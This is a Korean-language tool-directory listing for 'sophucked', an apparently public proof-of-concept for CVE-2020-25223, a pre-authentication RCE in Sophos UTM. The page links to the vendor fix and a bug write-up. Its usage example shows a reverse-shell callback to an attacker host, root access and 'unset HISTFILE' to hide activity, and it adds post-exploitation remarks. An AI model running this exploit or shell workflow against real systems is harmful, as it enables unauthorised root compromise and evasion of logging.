Skip to content
KitploitKITPLOIT
도구블로그
제출
도구블로그
제출

해킹, 침투 테스트 및 사이버 보안 도구를 당신의 보안 무기고에!

Kitploit은 해킹, 사이버 보안 및 침투 테스트 도구 디렉토리입니다. 최신 프로젝트 업데이트를 발견하여 취약점을 찾고, 시스템을 분석하고, 테스트를 자동화하고, 보안을 강화하세요.

··피드·문의·개인정보·© 2026 Kitploit

도구 디렉토리

카테고리

모든 카테고리 보기
Loading categories
sophucked — CVE-2020-25223 | Kitploit
도구/GitHubGitHub/darrenmartyn/sophucked
Vulnerability AnalysisExploitationWeb Application ExploitationPenetration TestingRed TeamingRemote Access Tool
GitHubdarrenmartyn/sophucked

sophucked

CVE-2020-25223

저장소 보기
1114년 전아직 검토되지 않음

인기

모두 보기 →

커뮤니티에서 가장 많이 사용되는 도구를 찾아보세요.

모든 도구 탐색

도구 컬렉션을 둘러보세요

모든 도구 보기 →
공유

sophucked

CVE-2020-25223 RCE PoC, 역방향 셸 획득. 사전 인증 없음. 일부 위협 요소를 통합하기 위해 급히 구현했습니다.

예제 사용법:

root@kitploit:~
# python sophucked.py https://x.x.x.x:4443 x.x.x.x 80
(+) 포트 80에서 핸들러 시작
(+) 콜백을 x.x.x.x:80으로 전송
(+) x.x.x.x에서 연결됨
(+) 셸 획득!
bash: 이 셸에서는 작업 제어 불가
utm:/var/confd # unset HISTFILE
unset HISTFILE
utm:/var/confd # id
id
uid=0(root) gid=0(root) groups=0(root)
utm:/var/confd # exit
exit
exit
*** 원격 호스트에 의해 연결 종료 ***
# 

스캐닝/탐지

여기서는 구현되지 않았습니다. nuclei 템플릿을 사용하세요.

사후 침투 참고 사항

이들은 파이썬 인터프리터를 가지고 있으며, 실제로 매우 완벽한 기능의 리눅스 환경을 사용할 수 있습니다. 사후 침투를 위한 놀라운 잠재력이 있습니다.

블루 팀 참고 사항

관심 있는 누군가가 이 부분을 채울 것이라고 확신합니다. Bitter("블루 팀 트위터"의 하위 집합)가 아마 곧 그렇게 할 것입니다. 즉, 암호화되지 않은 역방향 셸이 Unified Threat Manager 상자에서 신호를 보내는 것을 탐지하는 것이 그렇게 어렵지 않을 것입니다, 그렇죠?

버그 수정

(아마도 Sophos에서 온) 누군가가 이 공식 수정 링크를 보내왔습니다. UTM을 업데이트하세요. https://www.sophos.com/en-us/security-advisories/sophos-sa-20200918-sg-webadmin-rce

참고 자료 등

타사 참고 자료 (버그 세부 정보): https://www.atredis.com/blog/2021/8/18/sophos-utm-cve-2020-25223

Sophos에 직접 불만을 제기하세요. 21세기에 사용자 입력을 Perl의 open()에 전달하는 것이 좋은 생각이라고 생각한 것은 이해하기 어렵습니다.

도구 다운로드